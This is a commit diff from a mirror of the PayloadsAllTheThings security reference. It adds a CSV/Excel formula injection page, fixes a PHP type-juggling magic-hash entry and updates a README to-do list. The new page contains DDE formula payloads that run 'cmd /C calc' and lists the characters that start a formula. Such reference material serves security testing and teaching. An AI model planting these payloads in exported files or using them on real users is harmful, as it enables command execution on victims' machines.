mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-23 21:05:27 +00:00
Fix in juggling type + CSV injection
This commit is contained in:
parent
bce6dc6d3d
commit
bfd50ae2cb
@ -1,12 +1,29 @@
|
|||||||
# Title
|
# CSV Excel formula injection
|
||||||
Lorem
|
Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
|
||||||
|
|
||||||
## Vuln
|
## Exploit
|
||||||
|
|
||||||
|
Basic exploit with Dynamic Data Exchange
|
||||||
|
```
|
||||||
|
DDE ("cmd";"/C calc";"!A0")A0
|
||||||
|
@SUM(1+1)*cmd|' /C calc'!A0
|
||||||
|
|
||||||
|
Technical Details of the above payload:
|
||||||
|
cmd is the name the server can respond to whenever a client is trying to access the server
|
||||||
|
/C calc is the file name which in our case is the calc(i.e the calc.exe)
|
||||||
|
!A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data
|
||||||
|
|
||||||
```
|
```
|
||||||
Code
|
|
||||||
|
Any formula can be started with
|
||||||
|
```
|
||||||
|
=
|
||||||
|
+
|
||||||
|
–
|
||||||
|
@
|
||||||
```
|
```
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* Lorem
|
* https://owasp.org/index.php/CSV_Excel_Macro_Injection
|
||||||
* Ipsum
|
* https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection
|
||||||
|
*https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
|
@ -18,7 +18,7 @@ var_dump('0xABCdef' == ' 0xABCdef');
|
|||||||
| Hash | “Magic” Number / String | Magic Hash | Found By |
|
| Hash | “Magic” Number / String | Magic Hash | Found By |
|
||||||
| ---- | -------------------------- |:---------------------------------------------:| -------------:|
|
| ---- | -------------------------- |:---------------------------------------------:| -------------:|
|
||||||
| MD5 | 240610708 | 0e462097431906509019562988736854 | Michal Spacek |
|
| MD5 | 240610708 | 0e462097431906509019562988736854 | Michal Spacek |
|
||||||
| SHA1 | col 3 is | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
|
| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
|
||||||
|
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
|
@ -3,7 +3,6 @@ A list of usefull payloads and bypasses for Web Application Security
|
|||||||
|
|
||||||
TODO:
|
TODO:
|
||||||
* PHP Serialization
|
* PHP Serialization
|
||||||
* CSV Injection
|
|
||||||
|
|
||||||
To improve:
|
To improve:
|
||||||
* RCE
|
* RCE
|
||||||
@ -15,9 +14,6 @@ To improve:
|
|||||||
* Traversal Directory
|
* Traversal Directory
|
||||||
* XSS
|
* XSS
|
||||||
* PHP Include
|
* PHP Include
|
||||||
|
* CSV Injection
|
||||||
|
|
||||||
TODO v2:
|
# /!\ Work in Progress : 70%
|
||||||
* Remove "_" in dir name
|
|
||||||
* Add CVE : Hearbleed and ShellShock ?
|
|
||||||
|
|
||||||
# /!\ Work in Progress : 40%
|
|
||||||
|
Loading…
Reference in New Issue
Block a user